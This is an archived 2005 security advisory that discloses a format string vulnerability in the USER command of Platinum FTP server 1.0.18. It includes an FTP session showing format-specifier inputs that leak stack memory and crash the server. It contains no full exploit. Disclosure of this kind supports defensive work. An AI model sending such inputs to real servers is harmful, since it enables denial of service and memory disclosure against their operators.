platinumFormat.txt

platinumFormat.txt: Posted Mar 22, 2005; Authored by c0d3r; Platinum FTP server versions 1.0.18 and below are susceptible to a format string attack.; tags | advisory; SHA-256 | 5f002300af0e2c8a4311776c1638f1185e8ac1dd9efea523311c789beaf029de; Download | Favorite | View

platinumFormat.txt

**********************************************************************
advisory URL :  http://www.ihsteam.com/advisory/PlatinumFTPserver.txt
**********************************************************************

********************************************
IHS Iran Hackers Sabotage Public advisory
by : c0d3r "Kaveh Razavi"  c0d3r@ihsteam.com
********************************************

well yesterday a guy found a simple user overflow in PlatinumFTPserver vr
: 1.0.18 and prior.
I downloaded the package at :
http://www.roboshareware.com/products/PlatinumFTPserver.exe
and started to disassemble the vulnerability . He was written a DoS .
PlantiumFTP has got a good error controlling system . so eip overwrite is
not easy .
but I found another vulnerability when I was fuzzing .
the server is also vulnerable to USER format string attack .
here is the result :
---------------------------------------
C:\Documents and Settings\root>ftp
ftp> open 127.0.0.1
Connected to 127.0.0.1.
220-PlatinumFTPserver V1.0.18
220 Enter login details
User (127.0.0.1:(none)): user %x%x
331 Password required for user 026d0048.
Password:
---------------------------------------
ftp> user AAAA%x%x%x%x
331 Password required for user AAAA026d0048020313333.
Password:
---------------------------------------
ftp> user
AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
331 Password required for
AAAA026d00480203133337373615064726f7771657220657269756f662064414120727825414178257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825d2e782512000a77f5508212cdd812ce1012cdfc12cdb01305dc012ce00.
Password:
---------------------------------------
ftp> user AAAA%s%s
331 Password required for AAAAÈsÈjÈ{PÈ`     .
Password:
---------------------------------------
ftp> user
AAAA%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
hanging ==>
szAppName : PlatinumFTPserverEngine.exe     szAppVer : 1.0.0.18
szModName : user32.dll     szModVer : 5.1.2600.1106     offset : 00008f7f
The instruction at "0x01606feb" refrenced memory at "0xaf613daf". the
memory could not be "written".
---------------------------------------
and these kinda playing !

I am busy with university etrance exam stuff so I cant write the exploit
code and really it doesnt cost .
well laters . and this will be the last sweet to IHS until my shitty exam .
all the credits go to IHSteam.com .
greetz fly to : LorD and NT of ihsteam , Jamie of exploitdev.org and other
friends and security teams .
well I will come to u later shervin_kesafat my great lamer !

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

platinumFormat.txt

platinumFormat.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

platinumFormat.txt

Share This

platinumFormat.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems